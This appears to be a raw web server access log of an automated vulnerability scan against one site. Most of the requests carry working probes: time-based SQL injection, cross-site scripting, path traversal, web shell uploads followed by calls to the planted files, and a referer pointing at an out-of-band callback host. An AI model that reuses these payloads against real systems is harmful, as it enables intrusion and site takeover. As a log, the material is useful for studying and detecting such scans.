"https://mgrokokbet.id/info.html" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:30:12 -0400] "POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:30:14 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:30:23 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:32:08 -0400] "POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:32:21 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /adminer/adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /_adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /_adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /adminer.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /adminer/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:32:22 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:32:38 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:13 -0400] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:30 -0400] "GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1" 200 0 "http://interact.sh/127.0.0.1.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:33:48 -0400] "GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:34:15 -0400] "POST /casa/nodes/thumbprints HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:34:18 -0400] "POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:34:19 -0400] "POST /auth/realms/master/clients-registrations/default HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:34:25 -0400] "POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/618.5.10 (KHTML, like Gecko) Version/17.5 Safari/618.5.10" 154.84.62.234 - - [24/Apr/2025:06:34:31 -0400] "POST /realms/master/clients-registrations/default HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.23" 154.84.62.234 - - [24/Apr/2025:06:34:33 -0400] "POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:34:37 -0400] "POST /realms/master/clients-registrations/openid-connect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.4.24" 154.84.62.234 - - [24/Apr/2025:06:34:40 -0400] "POST /lucee/admin/imgProcess.cfm?file=/../../../context/2w9rfSNLfXIxqzXBKDgEEw2brEL.cfm HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:34:46 -0400] "POST /lucee/2w9rfSNLfXIxqzXBKDgEEw2brEL.cfm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - user [24/Apr/2025:06:34:51 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.27" 154.84.62.234 - admin [24/Apr/2025:06:34:58 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:35:11 -0400] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:36:51 -0400] "POST /_bulk HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0" 154.84.62.234 - - [24/Apr/2025:06:36:51 -0400] "POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:37:12 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:37:15 -0400] "POST /AdminService/urest/v1/LogonResource HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:06:37:19 -0400] "POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:38:21 -0400] "GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:06:38:41 -0400] "POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:38:58 -0400] "GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q=aHR0cDovL2xpa2VidG4uY29tLm9hc3QubWU=\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - admin [24/Apr/2025:06:39:30 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:39:43 -0400] "GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:40:41 -0400] "GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:40:41 -0400] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:40:58 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:06:41:30 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.34" 154.84.62.234 - - [24/Apr/2025:06:41:35 -0400] "POST /wp-comments-post.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:41:45 -0400] "GET /wp-content/plugins/imagements/images/2w9rfehwcgxo7sxvwsefzfmtvkl.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:42:55 -0400] "POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:06:43:02 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:43:09 -0400] "GET /wp-content/uploads/kaswara/fonts_icon/aekvtn/ru.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:43:43 -0400] "GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:06:44:25 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.16" 154.84.62.234 - - [24/Apr/2025:06:44:31 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:44:54 -0400] "GET /wp-content/themes/jnews/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:44:58 -0400] "GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:06:45:09 -0400] "GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0" 154.84.62.234 - - [24/Apr/2025:06:45:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:45:17 -0400] "GET /wp-content/themes/bello/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:46:44 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:06:46:53 -0400] "GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:47:10 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:47:45 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:47:56 -0400] "POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:48:22 -0400] "GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:49:24 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:49:31 -0400] "GET /wp-content/uploads/workreap-temp/2w9rfeXhYfyde1c0MNSgGFOFtaE.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 149.40.52.203 - - [24/Apr/2025:06:50:44 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 149.40.52.203 - - [24/Apr/2025:06:50:47 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 149.40.52.203 - - [24/Apr/2025:06:50:51 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edge/44.18363.8131" 154.84.62.234 - - [24/Apr/2025:06:51:22 -0400] "POST /wp-json/pie/v1/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:51:41 -0400] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:51:44 -0400] "GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:06:52:03 -0400] "GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:06:52:20 -0400] "GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:52:20 -0400] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:52:38 -0400] "POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:06:52:42 -0400] "GET /wp-admin/options.php HTTP/1.1" 200 0 "something" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:52:52 -0400] "GET /wp-admin/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:53:05 -0400] "GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:54:11 -0400] "POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:54:20 -0400] "GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:57:35 -0400] "GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:58:45 -0400] "GET /wp-content/plugins/wpcargo/includes/2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:58:45 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:58:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:58:51 -0400] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0" 154.84.62.234 - - [24/Apr/2025:06:58:57 -0400] "POST /wp-content/plugins/wpcargo/includes/2w9rfT0cIMzbpO1CBc2Wxws2Vq5.php?1=var_dump HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:00:14 -0400] "POST /run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:00:30 -0400] "GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:07:00:37 -0400] "GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:07:01:18 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:01:26 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:07:01:34 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:01:34 -0400] "POST /druid/indexer/v1/sampler HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:16 -0400] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:07:02:21 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /users/user-dark-features HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /confluence/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.18" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /wiki/pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /template/custom/content-editor HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /templates/editor-preload-container HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/createpage-entervariables.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.20" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /pages/templates2/viewpagetemplate.action HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:07:02:36 -0400] "POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 200 0 "-" 